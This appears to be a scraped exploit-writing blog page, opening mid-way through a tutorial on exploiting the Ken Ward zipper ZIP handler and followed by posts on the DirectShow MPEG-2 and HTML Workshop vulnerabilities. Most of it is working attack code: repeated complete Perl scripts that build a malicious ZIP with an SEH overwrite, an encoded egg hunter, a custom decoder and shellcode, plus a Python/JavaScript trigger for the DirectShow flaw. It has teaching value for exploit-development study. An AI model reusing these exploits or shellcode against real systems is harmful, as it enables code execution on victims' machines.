"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

As expected, after the 2 pop edx instructions were executed, edx now contains 0x0013F930.

That’s great

Does everything still looks fine ? Are you sure ?

Look at esp too. Esp now points at 0013F914, and that may be too far.

After all, If our custom decoder reproduces 8 bytes of code, then the first bye of the reproduced 8 byte opcode will be located at 0x0013F914 – 8 = 0013F90C

That will be a problem, because there are a number of instructions (starting at 0013F908) that would prevent these instructions from getting executed.

When the custom decoder finishes, it will simply execute the next instructions (A’s in our case, 0×41 or INC ECX), until it reaches the reproduced code. As we can see in the CPU view, we have some instructions that would break our execution flow (there’s the jump back, followed by 2 LEAVE instructions… in other words, if the reproduced code is written after those jump back & leave instructions, we would never reach them).

So instead of doing 72 popad’s, we’ll just do 71 popads, so ESP would point 32 bytes higher. Of course, we’ll have less space to put our custom decoder, but let’s see if that really is an issue.

Executing only 71 popad’s will change things again :

esp will point to another location (closer to the custom decoder, so that’s ok)
the stack will look different after 71 popad’s vs 72 popad’s. So we need to rethink/rebuild the code that we need to use to get edx aligned and pointing to the egg hunter (again)

Change the code (change from 72 popad’s to 71 popad’s)

After 71 popad’s are executed, (before the pop edx instructions are executed), the stack and registers look like this :

Hmmm – the stack contains A’s and some other useless crap, so that’s not going to help. We can no longer take the second value from the stack. And there is nothing in the useful in the registers either….

How can we get a good starting value in edx if there is nothing on the stack, and no registers point to a good value ?

Ah well, I lied. There is a register that can be used. In fact, we can just use esp.

It points to a usable address, so instead of doing 2 pop edx instructions, we could also put the value from esp into edx (basically do a push esp (0×54 = “T”) and pop edx.)

If we execute those 2 instructions after the 71 popad’s, edx contains 0x0013F8EC. In order to get to 0x0013F58E, we have to subtract 862 bytes (0x35E) from edx.

ok, so the instructions to reproduce are

sub edx,0x35E (\x81\xea\x5e\x03\x00\x00)
jmp edx (\xff\xe2)

(8 bytes of opcode)

The custom decoder that will reproduce those instructions looks like this :

(I already explained how to build this encoder in the QuickZip article part 1 (on the Offensive Security Blog), so I won’t explain it again)

Block 1 : reproducing 0×00 0×00 0xff 0xe2

First, clear eax :

"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".

Next, set eax to E2FF0000 and push it to the stack

"\x2d\x55\x55\x55\x5F".
"\x2d\x55\x55\x55\x5F".
"\x2d\x56\x55\x56\x5E".
"\x50"

= 26 bytes of code

Block 2 : reproducing 0×81 0xea 0x5e 0×03

First, clear eax :

"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".

Next, set eax to 035EEA81 and push it to the stack :

"\x2d\x2A\x5A\x35\x54".
"\x2d\x2A\x5A\x36\x54".
"\x2d\x2B\x61\x35\x54".
"\x50"

= 26 bytes of code

Oh – by the way – in case you are still struggling to build this decoder… pvefindaddr v1.24 (and up) includes a new feature that will produce an ascii encoder for you.

Quick preview :

ok, it’s not perfect, because you will have to filter out bad characters yourself (such as 0x5C), but at least this should give you a head start.

Version 1.26 (and higher) of pvefindaddr will include a basic bad char filter for this decoder and will allow you to specify a file (instead of typing the bytes) that contains the shellcode bytes that need to be wrapped into a decoder too. Quick demo ?

Or, perhaps even better, you will also be able to do this :

(basically generate opcode and encode it right away :-) )

(stay tuned – this new version will be released soon)

Anyways, back to where we’ve left off… the total size of the custom decoder is 52 bytes.

We already used 71 bytes for the popad instructions, and a few more bytes to get something into edx. That means that we cannot add the custom decoder in this block of 102 bytes ($filler2).

How are you going to structure the payload ? Where are you going to put the custom encoder ?

Let’s find out

We have to put the custom decoder into the other block of 102 bytes ($filler3), and use the remaining bytes of $filler2 (after the popad’s and edx alignment), to jump to the custom decoder at $filler 3. (We really have to make that jump forward because $filler3 starts with a jump back. Without the jump forward at $filler2, we would just trigger the jump back at the begin of $filler3 again, and end up in a loop. Kinda nice to see – but pretty useless at the same time).

The jump forward will need to be a short jump forward. A jump forward of about 32 bytes would be fine.

Since we have to use a conditional jump (character set limitation, remember ?), we need to look at the state of the flags.

C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)

Zero flag is 1, so we can use 0×74, with an offset of let’s say 0×20 (space, valid character in our buffer). Let’s put 0×74 0×20 after the push esp / pop edx instructions, and find out where that leads us to :

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

#alpha2 encoded egg hunter - w00t - basereg EDX
my $egghunter="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAA".
"Q2AB2BB0BBABXP8ABuJIRFMQzjYotOqRaBCZuRbxxMFNW".
"LUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $espalign="\x61" x 71;  #make esp happy
#make edx happy + jump to $filler3 (32 bytes forward)
my $edxalign="\x54\x5a\x74\x20";
my $filler2 = "A" x (102-length($espalign.$edxalign));
my $jmpback="\x74\xf7";     #jump back 102 bytes - to $espalign
my $filler3 = "A" x (102-length($jmpback));
my $filler1= "A" x ($offset - length($filename.$egghunter.
   $espalign.$edxalign.$filler2.$jmpback.$filler3));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$egghunter.$filler1.
$espalign.$edxalign.$filler2.
$jmpback.$filler3.
$nseh.$seh;

my $shellcode = "w00tw00t".
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

After the push esp/pop edx instructions are executed, we see the jump forward, which will properly jump over the jmpback code, and land in $filler3. So at that location (basically at $filler3 + 3 bytes padding), we can write our custom decoder.

Implementing the custom decoder

Let’s try :

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

#alpha2 encoded egg hunter - w00t - basereg EDX
my $egghunter="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAA".
"Q2AB2BB0BBABXP8ABuJIRFMQzjYotOqRaBCZuRbxxMFNW".
"LUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $espalign="\x61" x 71;  #make esp happy
#make edx happy + jump to $filler3 (32 bytes forward)
my $edxalign="\x54\x5a\x74\x20";
my $filler2 = "A" x (102-length($espalign.$edxalign));
my $jmpback="\x74\xf7";     #jump back 102 bytes - to $espalign
my $decoder = "AAA".   #3 bytes padding needed before decoder
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x55\x55\x55\x5F".
"\x2d\x55\x55\x55\x5F".
"\x2d\x56\x55\x56\x5E".
"\x50".
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x2A\x5A\x35\x54".
"\x2d\x2A\x5A\x36\x54".
"\x2d\x2B\x61\x35\x54".
"\x50";

my $filler3 = "A" x (102-length($jmpback.$decoder));
my $filler1= "A" x ($offset - length($filename.$egghunter.
   $espalign.$edxalign.$filler2.$jmpback.$decoder.$filler3));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$egghunter.$filler1.
$espalign.$edxalign.$filler2.
$jmpback.$decoder.$filler3.
$nseh.$seh;

my $shellcode = "w00tw00t".
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

After the custom decoder finishes reproducing the original code, we can see that it has nicely written the code a few bytes below the end of the decoder (see screenshot below, reproduced code can be found at 0x0013F8E4)

Conveniently, the INC ECX instructions (A’s) between the end of the decoder and the reproduced bytecode, will act as a nop here. So when the decoder has finished, it will execute a bunch of harmless inc ecx instructions, and will eventually execute the sub edx,35E and jmp edx instructions.

Step through until the jmp edx instruction. Don’t make the jump yet, just verify that EDX now points at the start of the egg hunter :

That looks fine.

If you now press F9, the egg hunter should run, locate the shellcode, and execute it :

pwned !

About the author

Peter Van Eeckhoutte (a.k.a. “corelanc0d3r”) has been working in IT System Engineering and Security since 1997. He currently serves as IT Infrastructure Manager and Security Officer for a large European company.

He is owner of the Corelan Blog, author of several exploit writing tutorials, a variety of free tools, maintains/moderates an exploit writing forum, and founder of the Corelan Team, which is a group of people that share the same interests : gathering and sharing knowledge.

Peter is 35 years old and currently lives in Deerlijk, Belgium. You can follow him on twitter or reach him via peter dot ve [at] corelan {dot} be.

Thanks to

My buddies at Corelan Team, my friends all over the world, and of course Shahin Ramezany for giving me the opportunity to publish this article on the abysssec.com website.

(oh … and by the way Shahin : I’m really sorry I ruined your game last night – sorry bro ;-) )

Microsft Directshow and MPEG-2 Exploitation

shahin — Fri, 10 Jul 2009 14:01:13 +0000

hello we are really sorry for too late updates.

but we are busy but i have some good news and i will share with you soon . for now i want to have short talk about new DirectShow vulnerabilities one of this vulnerability is more fun and exploited in the wild in past days .and now exploit is available in the wild.

anyway here is orginal advisory (another good vulnerability from alex wheeler):

http://www.microsoft.com/technet/security/advisory/972890.mspx

this vulnerability can be exploit using varient browser exploitation method like Heap Spray.

and flowing simple script can trigger vulnerabilty :

#!/usr/bin/python
import sys , os
 
gif =  "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\xFF\xFF\xFF\xFF"    # End of SEH chain
gif += "\x41\x41\x41\x41"    # SE Handler
gif += "\x00"
 
fp = open("directshow.gif","wb")
fp.write(gif)
fp.close()

var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='directshow.gif;
// Vulnerable ID
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

here you can see overwritten SEH

and here you can see Spared Heap

finally as you can see here we got a shell

using methods like java-script obfuscation and shirking variables can make this exploit more dangerous . and you can find this exploit at :

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/browser/msvidctl_mpeg2.rb

and:

http://milw0rm.com/exploits/9108

Happy Hunting.

PS : i will try to have a technical post soon as soon possible

Cheers .

shahin

Format string exploitation on windows

shahin — Mon, 02 Feb 2009 13:28:21 +0000

Hello

i know , i know i have a big absence about 2 month . but i,m back with a big update for you .

a step by step article about exploiting format string vulnerabilities on windows platform.

here is download link for this article :

http://abysssec.com/blog/wp-content/uploads/2009/02/fstring-exploit.pdf

feel free to send your questions to admin@abysssec.com|NoSpam

Good Luck and Have Fun !

Microsoft HTML Workshop

shahin — Sat, 10 Jan 2009 09:25:51 +0000

Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit -

Another step towards perfect exploitation

This is my next article explaining my second public exploit implementing my recent Shellhunting technique.

Why use the technique? Well, believe me I could have made the exploit work on only one Windows version, be it XP or Vista, but to make it universal and work on every Windows NT system, you need to make it advanced.

The vulnerability itself is a normal stack overflow, overflowing all the variables on the stack including, the holy grail, the return address. There is also no character transformation, so why use a shellhunter for the exploit?

Here is why:-

To overflow the buffer, 280 bytes and above are needed, this isn’t enough space for a shellcode such as, reverse/bind shell or dl/exec scode, maybe only executing calculator will work.
To make it universal there was only one module that had the address, that module is the main applications executable: hhw.exe.
This address includes a “\x00″ byte (00h), this NULL byte will terminate any more overflow of the buffer so you cannot just simply jump/call the ESP register and execute shellcode after the controllable return address.

Those are the main reasons that need to be worried about. A professional exploit needs to be able to run any shellcode of any capability and size.With the Shellhunter the shellcode may even include NULL bytes!

Lets recap what a shellhunter does:-

Searches through memory for a certain “lookout” value that when located will revert program execution flow to the address at the “lookout”. Also the “lookout” values must be a set of friendly instructions that will not cause an unneeded “Access Violation”.
In this case there is no need for it to be alphanumerical, also size does not matter.

The new shellhunter in this exploit will be very different from the previous one. It will search through the whole memory of the application looking for the shellcode, it will not be using any register as a base to search from. The technique will also be reminiscent of skape’s egghunter technique (I actually have never read his article, but it is pretty cool that there will be a new/fresh look at this type of exploitation with my method ;) ).

Okay, so what are the new features I am talking about? The shellhunter has indeed increased drastically in size (111 bytes) and the freedom that there are no character restrictions makes it even easier. With that privilege I thought of searching the whole memory with the shellhunter.

Of course there are a few problems that come to mind with that:

Access Violations will occur when retrieving data from an invalid address.
We need to store the variable which is address currently searched.
The applications memory is a huge range from 0×00000000 to just below kernel base which is, 0x7fffffff. The shellhunter must search through the memory in speed, so that the shellcode will be executed fast.
Also, but I’ll discuss about this later, the stack layout has to be repaired by the shellhunter..

Wow, a load of problems.

Now I will write up how I solved them.

Access Violation problem when reading invalid memory

The first method that came to mind was to use the Structured Exception Handling, and that is the method I am using.

Basically the SEH, will handle exceptions when an exception is thrown out it will change the program flow to the address that is in SEH structure. It is in the basic form a linked list type, this is its layout on the stack:

[ Pointer to the next SEH record]

[Pointer to exception handler code]

